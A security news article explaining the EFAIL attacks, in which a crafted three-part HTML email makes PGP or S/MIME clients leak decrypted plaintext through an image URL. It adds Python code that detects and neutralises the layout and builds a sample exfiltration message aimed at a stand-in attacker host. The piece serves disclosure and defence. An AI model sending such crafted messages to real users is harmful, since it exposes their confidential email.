Saturday, June 15, 2024

EFAIL Attacks – How PGP & S/MIME Vulnerability Leaked Encrypted Emails in Plain Text

Researchers have now published full details of the EFAIL attacks, which exploit a serious new vulnerability affecting the PGP and S/MIME end-to-end email encryption technologies.

Researchers had already issued an early warning about this highly critical security flaw in PGP and S/MIME, advising users to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.

Email is normally protected in transit by Transport Layer Security, but people who need fully confidential communication in hostile environments, mainly whistleblowers, journalists and the like, add end-to-end encryption on top of it.

The EFAIL attacks can be used to break this additional encryption layer: anyone who gains access to the email communication can read the victim's emails even when they are additionally encrypted with PGP.

Sophisticated attackers also eavesdrop on email communications to steal the confidential information that many people share over email.

OpenPGP offers end-to-end encryption specifically for such sensitive communication, and S/MIME is an alternative end-to-end email encryption standard used to protect corporate environments from these powerful attacks.

The EFAIL attacks exploit vulnerabilities discovered in OpenPGP and S/MIME to reveal encrypted emails in plain text.

Here we can see the clients affected by the EFAIL attacks, broken down into S/MIME clients, PGP clients and those vulnerable to direct exfiltration attacks.

How Do the EFAIL Attacks Work

First, the attacker needs access to the encrypted emails. This can be achieved by eavesdropping on network traffic, or by compromising email servers, backup systems or email accounts, and includes emails that may have been collected as long as a year ago.

According to the researchers, “In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.”

The attacker then crafts a modified version of the encrypted email and sends it to the victim.

The victim's email client decrypts the email, and if the victim has configured the client to load external resources, the decrypted content is exfiltrated in plain text.

Understanding the EFAIL Attacks

The attacker sends the modified encrypted email to the victim's client as a new multipart email with three body parts:

  1. An HTML body part containing an image tag whose src attribute opens a quote that is never closed
  2. A second body part containing the PGP or S/MIME ciphertext
  3. A third HTML body part that closes the src attribute opened in the first part

When the attacker sends this email to the victim, the victim's email client decrypts the second body part and stitches the three body parts together into one HTML email.

The URL now spans all four lines, since the image tag opened in line 1 is only closed in line 4.

According to the researchers, the email client then URL-encodes all non-printable characters (e.g., %20 is a whitespace) and requests an image from that URL. As the path of the URL contains the plaintext of the encrypted email, the victim's email client sends the plaintext to the attacker.
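An added example, not the researchers' code, that builds the three-part layout described above as a constructed Python `email` message, flags it with a simple structural heuristic, and shows a defender-side mitigation that stops remote loads; the content types, the `attacker.invalid` host and the placeholder ciphertext are assumptions.

```python
import re
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Content types assumed to carry PGP or S/MIME ciphertext (a real filter would
# also descend into multipart/encrypted containers).
ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/octet-stream"}

def ends_inside_open_tag(html: str) -> bool:
    """True if the HTML stops inside a tag, e.g. <img src="http://... with no closing '>'."""
    last_open = html.rfind("<")
    return last_open != -1 and ">" not in html[last_open:]

def is_ciphertext_part(part) -> bool:
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    body = part.get_payload(decode=True) or b""
    return body.lstrip().startswith(b"-----BEGIN PGP MESSAGE-----")  # inline PGP

def find_efail_layout(msg):
    """Return indexes of HTML leaf parts that leave a tag open right before a ciphertext part."""
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    hits = []
    for i in range(len(leaves) - 1):
        part, nxt = leaves[i], leaves[i + 1]
        if part.get_content_type() != "text/html" or not is_ciphertext_part(nxt):
            continue
        html = part.get_payload(decode=True).decode("utf-8", errors="replace")
        if ends_inside_open_tag(html):
            hits.append(i)
    return hits

REMOTE_ATTR = re.compile(r'\b(src|href)(\s*=\s*["\']\s*(?:https?:)?//)', re.I)

def neutralize_remote_loads(html: str) -> str:
    """Mitigation in the spirit of 'disable HTML rendering': rename attributes that
    would trigger a network request so the client never fetches the URL."""
    return REMOTE_ATTR.sub(r"data-blocked-\1\2", html)

def build_sample(malicious: bool) -> MIMEMultipart:
    """Constructed three-part message mirroring the layout above; the ciphertext
    is a placeholder string, not a real PGP or S/MIME blob."""
    first = '<img src="http://attacker.invalid/' if malicious else '<img src="http://example.invalid/logo.png">'
    msg = MIMEMultipart("mixed")
    msg.attach(MIMEText(first, "html"))
    msg.attach(MIMEApplication(b"PLACEHOLDER-CIPHERTEXT", "pkcs7-mime"))
    msg.attach(MIMEText('">', "html"))
    return msg

if __name__ == "__main__":
    print(find_efail_layout(build_sample(True)), find_efail_layout(build_sample(False)))
```

The heuristic only covers the direct-exfiltration layout; the CBC/CFB gadget variants alter the ciphertext itself and are addressed by the vendor patches.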

EFAIL Attacks Mitigation

  • No decryption in email client – decrypt S/MIME or PGP emails in a separate application outside your email client.
  • Disable HTML rendering – since the attack relies on rendering HTML images and styles, disable the presentation of incoming HTML emails in your email client.
  • Patching – apply the patches released by vendors for the EFAIL vulnerabilities.
  • Update – update the OpenPGP and S/MIME standards.

Based on the researchers' analysis, 25 of the 35 tested S/MIME email clients and 10 of the 28 tested OpenPGP email clients are affected.

The EFAIL flaws have already been reported and two official CVE numbers have been released.

CVE-2017-17688: OpenPGP CFB gadget attacks
CVE-2017-17689: S/MIME CBC gadget attacks

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.